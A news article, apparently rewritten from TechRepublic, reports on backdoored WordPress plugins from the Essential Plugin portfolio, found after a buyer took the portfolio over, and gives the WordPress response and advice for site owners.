A web developer recently unearthed a multitude of malicious WordPress plugins embedded with clandestine backdoors that had infiltrated thousands of WordPress sites, following a report from a vigilant user.
These compromised plugins, originating from the Essential Plugin portfolio, were reportedly altered with a backdoor after a covert transfer of ownership.
Austin Ginder, the founder of Anchor Hosting, revealed that these malicious modifications lay dormant for an extensive eight months, skillfully evading early detection, thereby enabling numerous WordPress users to unwittingly install them before activation.
Rather than executing a direct assault on websites, the perpetrators opted to commandeer the plugins themselves, exemplifying a quintessential supply-chain attack. In response, WordPress has definitively terminated the affected plugins, halting any further installations.
Insights into the Malware’s Mechanism
An alert originating from a WordPress dashboard managed by a digital marketing agency, which was communicated to Ginder, incited a comprehensive security audit. This investigation revealed a protracted attack that has compromised 31 distinct WordPress plugins.
In a blog post, Ginder noted that the flagged plugin, Countdown Timer Ultimate, was found to contain code that could permit unauthorized third-party access to any website utilizing it. At that time, this plugin boasted over 20,000 active installations.
He further indicated that, despite undergoing a forced update from WordPress, the insidious code remained unaltered.
Ginder’s forensic examination through snapshot imaging disclosed that the plugin functioned legitimately until August 8, 2025.
Version 2.6.7, ostensibly designed for compatibility with WordPress version 6.8.2, included an additional 191 lines of code that facilitated the attacker’s unauthorized access to websites.
Upon tracing the malicious activity, Ginder discovered that an individual using the alias Kris had acquired the entire Essential Plugin portfolio for a sum undisclosed but ascertained to be in six figures. This portfolio, previously languishing, was made available by its original owners on Flippa.
The purchaser’s background in SEO, cryptocurrency, and online gambling aligns with the strategies employed by the attacker.
Notably, all compromised plugins under the Essential Plugin were found to connect to their Command and Control (C2) servers via an Ethereum smart contract, allowing the attacker to perpetually update their server post-blockage.
Ginder also revealed that within the malevolent code, the backdoor enabled the attacker to execute URL redirects to spam domains and fraudulent pages, eluding notice from site administrators.
Current Developments in the Incident
In a decisive move, WordPress, through its Plugins Team, has permanently deactivated all plugins associated with the Essential Plugin portfolio, thus preventing any new installations.
Ginder has also disseminated a comprehensive list of the 31 affected plugins, enabling site owners and administrators to ascertain whether any problematic plugins are in use.
The prudent course of action is to eliminate these plugins and seek alternatives. Ginder has additionally provided a succinct guide on rectifying your installations should you wish to continue using them. For further insights, users can refer to his blog, which outlines the plugins he has managed to fix.
Erosion of Trust Rather Than Credentials
While WordPress sites have historically been vulnerable to brute-force attacks, the contemporary trend indicates an increasing focus on its extensive collection of plugins as avenues for infiltration.
By acquiring these popular and reputable plugins, attackers are essentially purchasing user trust, ensuring that their impact reverberates across a substantial number of sites.
Even more troubling is WordPress’s failure to notify users regarding ownership changes of plugins, which facilitates a silent takeover by any attacker, enabling the distribution of malware unbeknownst to users.
Given that administrators often remain oblivious to plugin compromises until the damage is done, it is essential for site owners to conduct regular audits, meticulously reviewing installed plugins on at least a monthly basis.
Source link: Techrepublic.com.
